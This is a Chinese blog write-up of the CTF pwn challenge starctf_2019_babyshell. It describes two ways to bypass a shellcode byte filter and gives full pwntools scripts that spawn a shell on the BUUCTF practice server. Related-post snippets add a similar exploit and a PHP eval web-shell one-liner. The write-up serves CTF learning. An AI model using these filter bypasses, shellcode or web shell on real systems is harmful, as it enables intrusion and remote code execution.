starctf_2019_babyshell

最新推荐文章于 2022-04-19 23:18:11 发布
最新推荐文章于 2022-04-19 23:18:11 发布
阅读量502 收藏 1
点赞数 1
分类专栏: buuctf 题目 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/122874386
版权

starctf_2019_babyshell

查看保护
在这里插入图片描述

方法一:

在这里插入图片描述
这一题解法还挺多的。输入shellcode,将shellcode放到400786里判断
在这里插入图片描述
接着判断shellcode是否是byte_400978里面的字符,这题和可见字符很像,但难度高一点点,这里一开始笔者没有想到什么思路
在网上找了一些wp看了一下(wp),发现给的字符串强制转换成代码可以看到一些有用的东西
在这里插入图片描述
在这里插入图片描述
在主函数结束时有一个sys_read,mov eax,0 call rdx。
要调用sys_read我们要控制rax=0 rdi=0 rsi rdx。rdx为一个合适的值
在call下个断点看一下,做的时候忘记patchelf,导致打远程的时候失败了。。。
在这里插入图片描述
适合rdi 和 rdx的值都已经标注了。
这里选择0x4008f0作为rdx,08那里作为rdi。
pop rdi;pop rdi;pop rdi;pop rdx;pop rdi;pop rdi;pop rdi;pop rdi;pop rdi;pop rdi;syscall
rdi设置好了rdx也设置好了,就会再次调用sys_read,输入shellcode即可

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 28619)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

shellcode = asm('pop rdi;pop rdi;pop rdi;pop rdx;pop rdi;pop rdi;pop rdi;pop rdi;pop rdi;pop rdi;syscall')
r.sendlineafter(' plz:\n',shellcode)

sleep(1)
r.sendline(b'a'*0xC + asm(shellcraft.sh()))

r.interactive()

还有另外一种方法

方法二:

直接绕过400786的判断,这个时候就要构造\x00,只放\x00不可以的,会影响到后面的shellcode执行。
所以可以使用\x00来构造有意义的汇编代码。

00 40 00                 add    BYTE PTR [rax+0x0],  al
00 41 00                 add    BYTE PTR [rcx+0x0],  al
00 42 00                 add    BYTE PTR [rdx+0x0],  al
00 43 00                 add    BYTE PTR [rbx+0x0],  al
00 45 00                 add    BYTE PTR [rbp+0x0],  al
00 46 00                 add    BYTE PTR [rsi+0x0],  al
00 47 00                 add    BYTE PTR [rdi+0x0],  al

40应该会错的因为rax最好不要随便用,这里拿个5a(XD

00 5a 00                add    BYTE PTR [rdx+0x0], bl

绕过之后输入shellcode即可。

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 28619)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

shellcode = asm(shellcraft.sh())

p1 = b'\x00\x5a\x00' + shellcode
r.sendline(p1)

r.interactive()
z1r0.
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
BUUCTF(pwn)starctf_2019_babyshell
半岛铁盒的博客
04-06 351
这里要求我们需要输入一个SHellcode 然后进入 一个 if 比较; 只需要通过\x00绕过检查, 同时执行我们输入的shellcode \x00B后面加上一个字符, 对应一个汇编语句。 所以我们可以通过\x00B\x22、\x00B\x00等等来绕过那个检查 from pwn import * context.arch = "amd64" p = remote("node3.buuoj.cn",27993) payload = '\x00B3' + asm(shellcraft.sh()) p...
[BUUCTF]-PWN:starctf_2019_babyshell解析(汇编\x00开头绕过+shellcode)
最新发布
2301_79326813的博客
03-05 313
查看保护查看ida这里就是要输入shellcode,但是函数会有检测。在shellcode前面构造一个以\x00机器码开头的汇编指令,这样就可以绕过函数检查了。
BUUCTF之“starctf_2019_babyshell
Probeginner的博客
12-21 360
shellcode的强化
CTF编写
02-15
cce-babyshell,simple_cmdshell,simple_pwn,simple_rop,simple_uaf,tpu dreamhack-检查标志 hacklu-sparc 卡夫-shadowstack kapo-cnc,ezbof pctf-emojidb,ipppc,mojo seccon-加密器,kstack,kvdb ...
*CTF 2019 quicksort、babyshell、upxofcpp
weixin_30341735的博客
04-29 174
这次参加比赛总共出了三道,有两道队友都先交了,还是tcl,heap_master卡了差不多一天没解决。。。。还是记录一下出的题目吧 quicksort 题目大体流程就是输入要输入的数字数量,然后输入数字,经过一个快速排序输出,然后结束。 漏洞: gets函数这里存在栈溢出,可以覆盖i,j,ptr,num。 利用思路: libc泄露:可以修改ptr指向gets_got,并将i和n...
[BUUCTF]PWN——starctf_2019_babyshell(有限制的shellcode)
mcmuyanga的博客
03-23 869
starctf_2019_babyshell 例行检查,64位程序,开启了nx main函数,往buf里写入shellcode,然后程序会执行shellcod sub_400786(),这个函数会对我们输入的shellcode进行检查 检查的时候*i即可退出,可以使用\x00来绕过。 ...
BUUCTF-pwn(13)
njh18790816639的博客
01-17 598
wustctf2020_number_game 此时运用我们的计算机底层的知识,可知,计算机底层储存形式为补码! -2147483648的补码形式为0x80000000,它取反加一之后仍然是0x80000000,因此这边输入-2147483648 护网杯_2018_gettingstart 此时又要用到我们的数学知识! 转换浮点数工具 from pwn import * context(log_level='debug',os='linux',arch='amd64') binary = './2
PWN-shellcode-WP- (一)题目文件.rar
03-29
为几道搜集的真题,https://blog.csdn.net/qq_43390703/article/details/105181147中有对他们的详细解答,是学习pwn入门的很好练手和熟悉知识点以及pwn技巧的真题。
[BUUCTF-pwn]——starctf_2019_babyshell
Y_peak的博客
04-02 515
[BUUCTF-pwn]——starctf_2019_babyshell 学到了, 又学到了FMYY师傅太强了 只需要通过\x00绕过检查, 同时执行我们输入的shellcode就好 **\x00B后面加上一个字符, 对应一个汇编语句。**所以我们可以通过\x00B\x22、\x00B\x00等等来绕过那个检查 from pwn import * context.arch = "amd64" p = remote("node3.buuoj.cn",27993) #p = process("./starctf
BUUCTF刷题7
m0_51251108的博客
11-09 342
题目:护网杯_2018_gettingstart:(浮点数内存表示)starctf_2019_babyshell:(有限制的shellcode)picoctf_2018_buffer overflow 0:[BSidesCF 2019]Runit:(shellcode)wdb_2018_3rd_soEasy:(栈迁移)suctf_2018_stack:(栈平衡) 护网杯_2018_gettingstart:(浮点数内存表示) 参考师傅:护网杯_2018_gettingstart(浮点数内存表示) · 语雀
shellcode题总结
seaaseesa的博客
05-01 1239
shellcode题总结 有时shellcode受限,最好的方法一般就是勉强的凑出sys read系统调用来输入shellcode主体。下面从几个题来加深理解。 starctf_2019_babyshell 现在shellcode字节允许的范围在表内 我们直接用IDA强制转为汇编,我们发现pop rdx、pop rdi、syscall可以用。 而执行shellcode时,正好...
N1CTF2019——babypwn WP
qq_41252520的博客
10-13 566
保护 我的测试环境为ubuntu16.04.1 分析 添加操作中限制只能添加10个结构体: 结构体为: struct Staff{ char Name[0x10]; char *Description; int Description_Size; }; 漏洞存在删除操作中: 总的二进制程序逆向分析到这,下面来考虑怎么利用。 利用 这道题和warmup那道题有点相似,但...
BUUCTF pwn [HarekazeCTF2019]baby_rop
菜的只能随便写写博客
02-13 2574
0x01 文件分析   0x02 运行  一组回显   0x03 IDA  程序之中存在system函数,通过搜索字符串,还能得到’/bin/sh’字符串,一个简单的rop。   0x04 思路  简单rop,利用万能的gadget,pop rdi ret传入字符串并调用system,得到shell。此题flag的位置在/home/babyrop内,可以通过find -name flag...
buuoj刷题记录 - starctf_2019_babyshell
qq_34010404的博客
03-31 171
输入shellcode ,然后检查shellcode 只要shellcode第一个字节是0就可以了,但是必须是有效的指令,否则无法识别会导致程序崩掉。 先填一个\x00看一下,对应的opcode 是add 后面的shellcode已经无法识别了. 看一下intel开发手册,找到add指令 可以看到对应的opcode是00,把后面的操作数补全(随便找个可以写的地址就行)就不会影响后面shellcode的解析了. 然后就可以getshell啦 Volume_2_325383_NoRestrictio
[GXYCTF2019]BabyUpload
夜幕下的灯火阑珊的博客
05-13 3335
png文件不许上传,尝试上传jpg 修改后缀名为.htaccess,文件内容为 SetHandler application/x-httpd-php 上传一句话木马 <?php eval($_POST[cmd]);?> 失败,换一种方式 <script language='php'>eval($_POST[cmd]);</script> ...
CTF-PWN-ROPbaby(实验吧)
SuperGate的博客
02-07 1853
学rop的时候刷到的题,感觉很有启发于是就写下来。 本文很大程度上借鉴了如下文章: http://wzt.ac.cn/2018/04/02/ROP/ 进入正题。我们发现题目中给了我们libc的文件,在ropbaby程序中也可以直接查找libc基地址,因此我们就可以不用在主程序中寻找了。 首先我们查看ropbaby文件的保护方式 由于开了NX,shellcode的方式就不好弄了,因此我...
starctf 2019 hackme
weixin_46483787的博客
04-19 2567
学kernel的第四天 解包之后发现init是空的,好怪哦 接下来分析ko文件,可以看到只实现了一个ioctl比较有用 首先是与用户态交互,交互方式是每次32字节,可以看做一个结构体 struct io { dword idx dword padding qword buf qword len qword offset } 然后实现了增删读写四个功能 在读写的时候进行了怎样的操作我们来观察一下: 首先会根据传入的结构体中的idx来确定对哪个chunk进行操作,然后根据offset来确定要读写

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值